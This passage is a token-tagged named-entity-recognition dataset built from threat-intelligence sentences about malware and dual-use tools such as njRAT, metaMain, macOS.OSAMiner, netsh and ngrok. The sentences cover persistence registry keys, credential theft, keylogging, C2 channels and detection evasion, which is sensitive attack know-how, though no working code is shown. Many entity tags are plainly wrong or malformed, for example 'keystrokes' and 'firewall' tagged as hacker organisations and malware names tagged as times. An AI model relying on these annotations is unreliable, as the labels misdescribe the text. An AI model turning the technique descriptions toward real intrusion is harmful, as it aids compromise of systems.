"O" - ] - }, - { - "tokens": [ - "jRAT", - "can", - "list", - "local", - "services." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "has", - "the", - "capability", - "to", - "capture", - "video", - "from", - "a", - "webcam." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "has", - "been", - "distributed", - "as", - "HTA", - "files", - "with", - "VBScript." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "has", - "command", - "line", - "access." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "jRAT", - "uses", - "WMIC", - "to", - "identify", - "anti-virus", - "products", - "installed", - "on", - "the", - "victim’s", - "machine", - "and", - "to", - "obtain", - "firewall", - "details." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "macOS.OSAMiner", - "has", - "used", - "`osascript`", - "to", - "call", - "itself", - "via", - "the", - "`do", - "shell", - "script`", - "command", - "in", - "the", - "Launch", - "Agent", - "`.plist`", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "macOS.OSAMiner", - "has", - "searched", - "for", - "the", - "Activity", - "Monitor", - "process", - "in", - "the", - "System", - "Events", - "process", - "list", - "and", - "kills", - "the", - "process", - "if", - "running.", - "macOS.OSAMiner", - "also", - "searches", - "the", - "operating", - "system's", - "`install.log`", - "for", - "apps", - "matching", - "its", - "hardcoded", - "list,", - "killing", - "all", - "matching", - "process", - "names." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "macOS.OSAMiner", - "has", - "embedded", - "Stripped", - "Payloads", - "within", - "another", - "run-only", - "Stripped", - "Payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "macOS.OSAMiner", - "has", - "used", - "`curl`", - "to", - "download", - "a", - "Stripped", - "Payloads", - "from", - "a", - "public", - "facing", - "adversary-controlled", - "webpage." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "macOS.OSAMiner", - "has", - "placed", - "a", - "Stripped", - "Payloads", - "with", - "a", - "`plist`", - "extension", - "in", - "the", - "Launch", - "Agent's", - "folder." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Exp", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "macOS.OSAMiner", - "has", - "used", - "`launchctl`", - "to", - "restart", - "the", - "Launch", - "Agent." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "macOS.OSAMiner", - "has", - "used", - "`ps", - "ax", - "|", - "grep", - "<name>", - "|", - "grep", - "-v", - "grep", - "|", - "...`", - "and", - "`ps", - "ax", - "|", - "grep", - "-E...`", - "to", - "conduct", - "process", - "discovery." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "macOS.OSAMiner", - "has", - "used", - "run-only", - "Applescripts,", - "a", - "compiled", - "and", - "stripped", - "version", - "of", - "AppleScript,", - "to", - "remove", - "human", - "readable", - "indicators", - "to", - "evade", - "detection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "macOS.OSAMiner", - "can", - "parse", - "the", - "output", - "of", - "the", - "native", - "`system_profiler`", - "tool", - "to", - "determine", - "if", - "the", - "machine", - "is", - "running", - "with", - "4", - "cores." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "macOS.OSAMiner", - "can", - "gather", - "the", - "device", - "serial", - "number", - "and", - "has", - "checked", - "to", - "ensure", - "there", - "is", - "enough", - "disk", - "space", - "using", - "the", - "Unix", - "utility", - "`df`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "meek", - "uses", - "Domain", - "Fronting", - "to", - "disguise", - "the", - "destination", - "of", - "network", - "traffic", - "as", - "another", - "server", - "that", - "is", - "hosted", - "in", - "the", - "same", - "Content", - "Delivery", - "Network", - "(CDN)", - "as", - "the", - "intended", - "destination." - ], - "ner_tags": [ - "O", - "O", - "B-Tool", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "has", - "used", - "XOR-based", - "encryption", - "for", - "collected", - "files", - "before", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "support", - "an", - "HKCMD", - "sideloading", - "start", - "method." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "collect", - "files", - "and", - "system", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "decrypt", - "and", - "load", - "other", - "modules." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain's", - "module", - "file", - "has", - "been", - "encrypted", - "via", - "XOR." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "upload", - "collected", - "files", - "and", - "data", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "has", - "deleted", - "collected", - "items", - "after", - "uploading", - "the", - "content", - "to", - "its", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "recursively", - "enumerate", - "files", - "in", - "an", - "operator-provided", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "download", - "files", - "onto", - "compromised", - "systems." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "log", - "mouse", - "events." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "create", - "a", - "named", - "pipe", - "to", - "listen", - "for", - "and", - "send", - "data", - "to", - "a", - "named", - "pipe-based", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "has", - "the", - "ability", - "to", - "log", - "keyboard", - "events." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "has", - "stored", - "the", - "collected", - "system", - "files", - "in", - "a", - "working", - "directory." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "write", - "the", - "process", - "ID", - "of", - "a", - "target", - "process", - "into", - "the", - "`HKEY_LOCAL_MACHINE\\SOFTWARE\\DDE\\tpid`", - "Registry", - "value", - "as", - "part", - "of", - "its", - "reflective", - "loading", - "activity." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "execute", - "an", - "operator-provided", - "Windows", - "command", - "by", - "leveraging", - "functions", - "such", - "as", - "`WinExec`,", - "`WriteFile`,", - "and", - "`ReadFile`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "establish", - "an", - "indirect", - "and", - "raw", - "TCP", - "socket-based", - "connection", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "has", - "authenticated", - "itself", - "to", - "a", - "different", - "implant,", - "Cryshell,", - "through", - "a", - "port", - "knocking", - "and", - "handshake", - "procedure." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "enumerate", - "the", - "processes", - "that", - "run", - "on", - "the", - "platform." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "inject", - "the", - "loader", - "file,", - "Speech02.db,", - "into", - "a", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "has", - "reflectively", - "loaded", - "a", - "DLL", - "to", - "read,", - "decrypt,", - "and", - "load", - "an", - "orchestrator", - "file." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "take", - "and", - "save", - "screenshots." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "encrypt", - "the", - "data", - "that", - "it", - "sends", - "and", - "receives", - "from", - "the", - "C2", - "server", - "using", - "an", - "RC4", - "encryption", - "algorithm." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "collect", - "the", - "computer", - "name", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "collect", - "the", - "username", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "has", - "delayed", - "execution", - "for", - "five", - "to", - "six", - "minutes", - "during", - "its", - "persistence", - "establishment", - "process." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "change", - "the", - "`CreationTime`,", - "`LastAccessTime`,", - "and", - "`LastWriteTime`", - "file", - "time", - "attributes", - "when", - "executed", - "with", - "`SYSTEM`", - "privileges." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "can", - "use", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "metaMain", - "registered", - "a", - "WMI", - "event", - "subscription", - "consumer", - "called", - "\"hard_disk_stat\"", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "nbtstat", - "can", - "be", - "used", - "to", - "discover", - "local", - "NetBIOS", - "domain", - "names." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "nbtstat", - "can", - "be", - "used", - "to", - "discover", - "current", - "NetBIOS", - "sessions." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "netsh", - "can", - "be", - "used", - "to", - "disable", - "local", - "firewall", - "settings." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "netsh", - "can", - "be", - "used", - "as", - "a", - "persistence", - "proxy", - "technique", - "to", - "execute", - "a", - "helper", - "DLL", - "when", - "netsh.exe", - "is", - "executed." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "netsh", - "can", - "be", - "used", - "to", - "set", - "up", - "a", - "proxy", - "tunnel", - "to", - "allow", - "remote", - "host", - "access", - "to", - "an", - "infected", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "netsh", - "can", - "be", - "used", - "to", - "discover", - "system", - "firewall", - "settings." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "netstat", - "can", - "be", - "used", - "to", - "enumerate", - "local", - "network", - "connections,", - "including", - "active", - "TCP", - "connections", - "and", - "other", - "network", - "statistics." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ngrok", - "can", - "provide", - "DGA", - "for", - "C2", - "servers", - "through", - "the", - "use", - "of", - "random", - "URL", - "strings", - "that", - "change", - "every", - "12", - "hours." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ngrok", - "has", - "been", - "used", - "by", - "threat", - "actors", - "to", - "configure", - "servers", - "for", - "data", - "exfiltration." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "ngrok", - "can", - "tunnel", - "RDP", - "and", - "other", - "services", - "securely", - "over", - "internet", - "connections." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ngrok", - "can", - "be", - "used", - "to", - "proxy", - "connections", - "to", - "machines", - "located", - "behind", - "NAT", - "or", - "firewalls." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ngrok", - "has", - "been", - "used", - "by", - "threat", - "actors", - "to", - "proxy", - "C2", - "connections", - "to", - "ngrok", - "service", - "subdomains." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "njRAT", - "gathers", - "information", - "about", - "opened", - "windows", - "during", - "the", - "initial", - "infection." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "is", - "capable", - "of", - "manipulating", - "and", - "deleting", - "registry", - "keys,", - "including", - "those", - "used", - "for", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "has", - "used", - "AutoIt", - "to", - "compile", - "the", - "payload", - "and", - "main", - "script", - "into", - "a", - "single", - "executable", - "after", - "delivery." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "has", - "a", - "module", - "that", - "steals", - "passwords", - "saved", - "in", - "victim", - "web", - "browsers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "can", - "collect", - "data", - "from", - "a", - "local", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "has", - "modified", - "the", - "Windows", - "firewall", - "to", - "allow", - "itself", - "to", - "communicate", - "through", - "the", - "firewall." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "has", - "included", - "a", - "base64", - "encoded", - "executable." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "has", - "used", - "HTTP", - "to", - "receive", - "stolen", - "information", - "from", - "the", - "infected", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "has", - "used", - "a", - "fast", - "flux", - "DNS", - "for", - "C2", - "IP", - "resolution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "is", - "capable", - "of", - "deleting", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "can", - "browse", - "file", - "systems", - "using", - "a", - "file", - "manager", - "module." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "can", - "download", - "files", - "to", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "is", - "capable", - "of", - "logging", - "keystrokes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "njRAT", - "can", - "create,", - "delete,", - "or", - "modify", - "a", - "specified", - "Registry", - "key", - "or", - "value." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "B-Features", - "O", - "B-Features", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "has", - "used", - "the", - "ShellExecute()", - "function", - "within", - "a", - "script." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "has", - "used", - "port", - "1177", - "for", - "HTTP", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "will", - "attempt", - "to", - "detect", - "if", - "the", - "victim", - "system", - "has", - "a", - "camera", - "during", - "the", - "initial", - "infection.", - "njRAT", - "can", - "also", - "detect", - "any", - "removable", - "drives", - "connected", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "has", - "executed", - "PowerShell", - "commands", - "via", - "auto-run", - "registry", - "key", - "persistence." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "can", - "search", - "a", - "list", - "of", - "running", - "processes", - "for", - "Tr.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "njRAT", - "can", - "read", - "specific", - "registry", - "values." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "has", - "added", - "persistence", - "via", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\</code>", - "and", - "dropped", - "a", - "shortcut", - "in", - "<code>%STARTUP%</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "has", - "a", - "module", - "for", - "performing", - "remote", - "desktop", - "access." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "can", - "identify", - "remote", - "hosts", - "on", - "connected", - "networks." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "can", - "be", - "configured", - "to", - "spread", - "via", - "removable", - "drives." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "can", - "capture", - "screenshots", - "of", - "the", - "victim’s", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "uses", - "Base64", - "encoding", - "for", - "C2", - "traffic." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "enumerates", - "the", - "victim", - "operating", - "system", - "and", - "computer", - "name", - "during", - "the", - "initial", - "infection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "enumerates", - "the", - "current", - "user", - "during", - "the", - "initial", - "infection." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "can", - "access", - "the", - "victim's", - "webcam." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "has", - "used", - "HTTP", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "njRAT", - "can", - "launch", - "a", - "command", - "shell", - "interface", - "for", - "executing", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "an", - "initial", - "connectivity", - "check", - "fails,", - "pngdowner", - "attempts", - "to", - "extract", - "proxy", - "details", - "and", - "credentials", - "from", - "Windows", - "Protected", - "Storage", - "and", - "from", - "the", - "IE", - "Credentials", - "Store.", - "This", - "allows", - "the", - "adversary", - "to", - "use", - "the", - "proxy", - "credentials", - "for", - "subsequent", - "requests", - "if", - "they", - "enable", - "outbound", - "HTTP", - "access." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "pngdowner", - "deletes", - "content", - "from", - "C2", - "communications", - "that", - "was", - "saved", - "to", - "the", - "user's", - "temporary", - "directory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "pngdowner", - "uses", - "HTTP", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "pwdump", - "can", - "be", - "used", - "to", - "dump", - "credentials", - "from", - "the", - "SAM." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "route", - "can", - "be", - "used", - "to", - "discover", - "routing", - "configuration", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "schtasks", - "is", - "used", - "to", - "schedule", - "tasks", - "on", - "a", - "Windows", - "system", - "to", - "run", - "at", - "a", - "specific", - "date", - "and", - "time." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "spwebmember", - "is", - "used", - "to", - "enumerate", - "and", - "dump", - "information", - "from", - "Microsoft", - "SharePoint." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sqlmap", - "can", - "be", - "used", - "to", - "automate", - "exploitation", - "of", - "SQL", - "injection", - "vulnerabilities." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "xCaon", - "has", - "added", - "persistence", - "via", - "the", - "Registry", - "key", - "<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Windows\\load</code>", - "which", - "causes", - "the", - "malware", - "to", - "run", - "each", - "time", - "any", - "user", - "logs", - "in." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "xCaon", - "has", - "uploaded", - "files", - "from", - "victims'", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "xCaon", - "has", - "decoded", - "strings", - 